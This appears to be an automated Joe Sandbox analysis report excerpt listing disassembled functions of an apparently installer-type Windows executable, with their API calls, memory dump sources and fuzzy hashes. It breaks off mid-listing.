                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$EnumLongWindows
                                                                                                                                                                      • String ID: TAB
                                                                                                                                                                      • API String ID: 4191631535-3846439302
                                                                                                                                                                      • Opcode ID: 19508b105e07bab33860b27abf9b752e23d544e284505d5f1a6339f97510727e
                                                                                                                                                                      • Instruction ID: 44c8a23491b9c45dd34cf4bcc3c04de93252e86aee0086cff54aee2134896fd7
                                                                                                                                                                      • Opcode Fuzzy Hash: 19508b105e07bab33860b27abf9b752e23d544e284505d5f1a6339f97510727e
                                                                                                                                                                      • Instruction Fuzzy Hash: 7B112A70704610ABDB10DF28D985F5677E8EB08725F51026AF994EB2E3C378AD41CB59
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0041F478 Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 708 41f478-41f4a6 GetClassInfoA 709 41f4b2-41f4b4 708->709 710 41f4a8-41f4b0 708->710 712 41f4c7-41f4cc RegisterClassA 709->712 713 41f4b6-41f4c2 UnregisterClassA 709->713 710->709 711 41f4d1-41f512 call 4062e8 call 41f3bc SetWindowLongA 710->711 712->711 713->712
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetClassInfoA.USER32(00400000,0041F468,?), ref: 0041F499
                                                                                                                                                                      • UnregisterClassA.USER32(0041F468,00400000), ref: 0041F4C2
                                                                                                                                                                      • RegisterClassA.USER32(00499598), ref: 0041F4CC
                                                                                                                                                                      • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F507
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4025006896-0
                                                                                                                                                                      • Opcode ID: 5ec069c7c9c2b05e07a1ad082ae1ddc788b6d41b1d6ae8ef870a4e5546751218
                                                                                                                                                                      • Instruction ID: e4d668e9dca91fd32e585eae6d60143d6dfbdf42e70c096e3b85bfad9ab1786c
                                                                                                                                                                      • Opcode Fuzzy Hash: 5ec069c7c9c2b05e07a1ad082ae1ddc788b6d41b1d6ae8ef870a4e5546751218
                                                                                                                                                                      • Instruction Fuzzy Hash: 63016D722001046BDB10EBACED81E9B3798A729314B10423FBA15E73A2D7399D458BAC
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004230C0 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • 7406A670.USER32(00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423116
                                                                                                                                                                      • EnumFontsA.GDI32(00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423129
                                                                                                                                                                      • 74074720.GDI32(00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 00423131
                                                                                                                                                                      • 7406A580.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 0042313C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 7406$74074720A580A670EnumFonts
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3216231476-0
                                                                                                                                                                      • Opcode ID: 9afbfd5fafda1dbd28af8ddef14be35d640b69e4e8358016454380424bd4bee6
                                                                                                                                                                      • Instruction ID: 69cee35535e214b40259e1ab78654d31e06b117eb7ed13cd681158bdd9fae355
                                                                                                                                                                      • Opcode Fuzzy Hash: 9afbfd5fafda1dbd28af8ddef14be35d640b69e4e8358016454380424bd4bee6
                                                                                                                                                                      • Instruction Fuzzy Hash: 2F01D2717442102AE700BF795CC6B9B36A4DF04318F40027BF808AB3C6D6BE9C0547AE
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004980B4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,004980C2), ref: 0040334B
                                                                                                                                                                        • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,004980C2), ref: 00403356
                                                                                                                                                                        • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,004980CC), ref: 00406322
                                                                                                                                                                        • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                                                                                                        • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                                                                                                        • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                                                                                                        • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,004980CC), ref: 00406366
                                                                                                                                                                        • Part of subcall function 00409B70: 702B1CD0.COMCTL32(004980D6), ref: 00409B70
                                                                                                                                                                        • Part of subcall function 0041094C: GetCurrentThreadId.KERNEL32 ref: 0041099A
                                                                                                                                                                        • Part of subcall function 00419038: GetVersion.KERNEL32(004980EA), ref: 00419038
                                                                                                                                                                        • Part of subcall function 0044F73C: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004980FE), ref: 0044F777
                                                                                                                                                                        • Part of subcall function 0044F73C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F77D
                                                                                                                                                                        • Part of subcall function 0044FBE4: GetVersionExA.KERNEL32(0049B790,00498103), ref: 0044FBF3
                                                                                                                                                                        • Part of subcall function 004531C4: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531E4
                                                                                                                                                                        • Part of subcall function 004531C4: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004531EA
                                                                                                                                                                        • Part of subcall function 004531C4: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531FE
                                                                                                                                                                        • Part of subcall function 004531C4: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453204
                                                                                                                                                                        • Part of subcall function 00456ED4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456EF8
                                                                                                                                                                        • Part of subcall function 0046441C: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498126), ref: 0046442B
                                                                                                                                                                        • Part of subcall function 0046441C: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464431
                                                                                                                                                                        • Part of subcall function 0046CC10: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CC25
                                                                                                                                                                        • Part of subcall function 004786B4: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498130), ref: 004786BA
                                                                                                                                                                        • Part of subcall function 004786B4: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004786C7
                                                                                                                                                                        • Part of subcall function 004786B4: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004786D7
                                                                                                                                                                        • Part of subcall function 004950C0: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 004950D9
                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001,00000000,00498178), ref: 0049814A
                                                                                                                                                                        • Part of subcall function 00497E74: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498154,00000001,00000000,00498178), ref: 00497E7E
                                                                                                                                                                        • Part of subcall function 00497E74: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00497E84
                                                                                                                                                                        • Part of subcall function 004244CC: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244EB
                                                                                                                                                                        • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                                                                                                                                      • ShowWindow.USER32(?,00000005,00000000,00498178), ref: 004981AB
                                                                                                                                                                        • Part of subcall function 00481B8C: SetActiveWindow.USER32(?), ref: 00481C3A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorFormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                                                                                                      • String ID: Setup
                                                                                                                                                                      • API String ID: 504348408-3839654196
                                                                                                                                                                      • Opcode ID: c82cb4154b49966d52098e7678e9f8cbacc3d3e1a40bce85d329610fd5ea755b
                                                                                                                                                                      • Instruction ID: d0c772c7b00e67a50ac74b8b43c66aaf35bd51fc0d8445b6be8c1c392d06dbfc
                                                                                                                                                                      • Opcode Fuzzy Hash: c82cb4154b49966d52098e7678e9f8cbacc3d3e1a40bce85d329610fd5ea755b
                                                                                                                                                                      • Instruction Fuzzy Hash: 6E31A471208A409ED601BBB7ED53A293B98EF89B18B61447FF80482593DE3D5C158A7E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00456ED4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00456E64: CoInitialize.OLE32(00000000), ref: 00456E6A
                                                                                                                                                                        • Part of subcall function 0042E38C: SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                                                                                                                                        • Part of subcall function 0042E38C: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456EF8
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                                                                                                                      • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                                                                                                      • API String ID: 2906209438-2320870614
                                                                                                                                                                      • Opcode ID: 79bd52c0b15069dab5411005638108abb2eaee90af60e23664d50899bed5f51a
                                                                                                                                                                      • Instruction ID: 195fe0e36b32ee525331c9a8c220a45252f3edc4141651a384f0b9e1c2da6bc9
                                                                                                                                                                      • Opcode Fuzzy Hash: 79bd52c0b15069dab5411005638108abb2eaee90af60e23664d50899bed5f51a
                                                                                                                                                                      • Instruction Fuzzy Hash: 45C00291B4265092CA40B7FA695261E28049B8031AB92813BB951A7587CA6C88099A6E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0046CC10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0042E38C: SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                                                                                                                                        • Part of subcall function 0042E38C: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CC25
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressErrorLibraryLoadModeProc
                                                                                                                                                                      • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                                                                                      • API String ID: 2492108670-2683653824
                                                                                                                                                                      • Opcode ID: cec18fb6262c442b10f10c95fc4e789d89a8ea6466fc2a264c548db39baeed30
                                                                                                                                                                      • Instruction ID: f133f44782887ed2db26bd8e5f2adaf6b1782a38bec069888892578a86e918ee
                                                                                                                                                                      • Opcode Fuzzy Hash: cec18fb6262c442b10f10c95fc4e789d89a8ea6466fc2a264c548db39baeed30
                                                                                                                                                                      • Instruction Fuzzy Hash: 85B092A060274086CB00B7A2699262B28059740309B90803BB0889B286EA3C88121BEF
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004243F4 Relevance: 4.6, APIs: 3, Instructions: 59windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0042440A
                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 00424487
                                                                                                                                                                      • DispatchMessageA.USER32(?), ref: 00424491
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$DispatchPeekTranslate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4217535847-0
                                                                                                                                                                      • Opcode ID: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                                                                                                                      • Instruction ID: b41559e7cef9b8617ee35765752275fac57a970be1b78d71f4432c2d4d9c435b
                                                                                                                                                                      • Opcode Fuzzy Hash: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                                                                                                                      • Instruction Fuzzy Hash: E911943030471096EA20F6A4E94179B73D4DFC1748F80485EF98997382D7BD9E45979F
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0047E750 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 79COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,0047E91D,?,?,00000001,00000000), ref: 0047E786
                                                                                                                                                                      Strings
                                                                                                                                                                      • /SPAWNWND=$%x /NOTIFYWND=$%x , xrefs: 0047E7F1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window
                                                                                                                                                                      • String ID: /SPAWNWND=$%x /NOTIFYWND=$%x
                                                                                                                                                                      • API String ID: 2353593579-560813925
                                                                                                                                                                      • Opcode ID: 9ecf661a55cdf71d1495a10766025aa445f8b93e2d058c2b3b7afd919951f93c
                                                                                                                                                                      • Instruction ID: ad4f215923409a7846021046c4babd34ed3e13106862ba7fbd7f1977e907304a
                                                                                                                                                                      • Opcode Fuzzy Hash: 9ecf661a55cdf71d1495a10766025aa445f8b93e2d058c2b3b7afd919951f93c
                                                                                                                                                                      • Instruction Fuzzy Hash: 7B31A574A042489FDB01DFA5C891EDDBFF8EB0D714F4584B6E504A7362D338A900CB69
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0047DABC Relevance: 3.2, APIs: 2, Instructions: 160windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetACP.KERNEL32(?,?,00000001,00000000,0047DD9B,?,-0000001A,0047FC14,-00000010,?,00000004,0000001B,00000000,0047FF61,?,0045D988), ref: 0047DB32
                                                                                                                                                                        • Part of subcall function 0042E314: 7406A670.USER32(00000000,00000000,0047FFC8,?,?,00000001,00000000,00000002,00000000,004808CA,?,?,?,?,?,004981E7), ref: 0042E323
                                                                                                                                                                        • Part of subcall function 0042E314: EnumFontsA.GDI32(?,00000000,0042E300,00000000,00000000,0042E36C,?,00000000,00000000,0047FFC8,?,?,00000001,00000000,00000002,00000000), ref: 0042E34E
                                                                                                                                                                        • Part of subcall function 0042E314: 7406A580.USER32(00000000,?,0042E373,00000000,00000000,0042E36C,?,00000000,00000000,0047FFC8,?,?,00000001,00000000,00000002,00000000), ref: 0042E366
                                                                                                                                                                      • SendNotifyMessageA.USER32(000801FA,00000496,00002711,-00000001), ref: 0047DD02
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 7406$A580A670EnumFontsMessageNotifySend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1244563898-0
                                                                                                                                                                      • Opcode ID: 1699f4068c0c5867e7106ba40e3d9973070bda02754bb9a23a09a502d1616ce7
                                                                                                                                                                      • Instruction ID: 990e0cae6f69a79882f0940071147895bcf3dc4f71101f62f717fb2ce75f629c
                                                                                                                                                                      • Opcode Fuzzy Hash: 1699f4068c0c5867e7106ba40e3d9973070bda02754bb9a23a09a502d1616ce7
                                                                                                                                                                      • Instruction Fuzzy Hash: FD517074A101008BCB21EF26E98169637B9EF94308B50C57BA8499F367C778ED46CB9D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00423234 Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 00423241
                                                                                                                                                                      • LoadCursorA.USER32(00000000,00000000), ref: 0042326B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CursorLoad
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3238433803-0
                                                                                                                                                                      • Opcode ID: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                                                                                                                                      • Instruction ID: 59516fef74be350ba7f17c0e511b54e8d6c2303d910d3728eb6a55db14448276
                                                                                                                                                                      • Opcode Fuzzy Hash: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                                                                                                                                      • Instruction Fuzzy Hash: 68F0271170421066D6109E3E6CC0A6B72A8DF82335B71037BFB3EC72D1CA2E1D414569
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0042E38C Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                                                                                                                                      • LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLibraryLoadMode
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2987862817-0
                                                                                                                                                                      • Opcode ID: 20ce414fb32ae07b7573fd0b61df4f6232578b58db3ae0e8f36edfd51c69e6e8
                                                                                                                                                                      • Instruction ID: aa33dc687cd71512c069df69893670fc4fcbad3b08ca7d4395289e8ee6212cdb
                                                                                                                                                                      • Opcode Fuzzy Hash: 20ce414fb32ae07b7573fd0b61df4f6232578b58db3ae0e8f36edfd51c69e6e8
                                                                                                                                                                      • Instruction Fuzzy Hash: 13F08270714B44BFDB019F779CA282BBBECEB49B1179249B6FD00A3691E53C5910C928
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004014E4 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
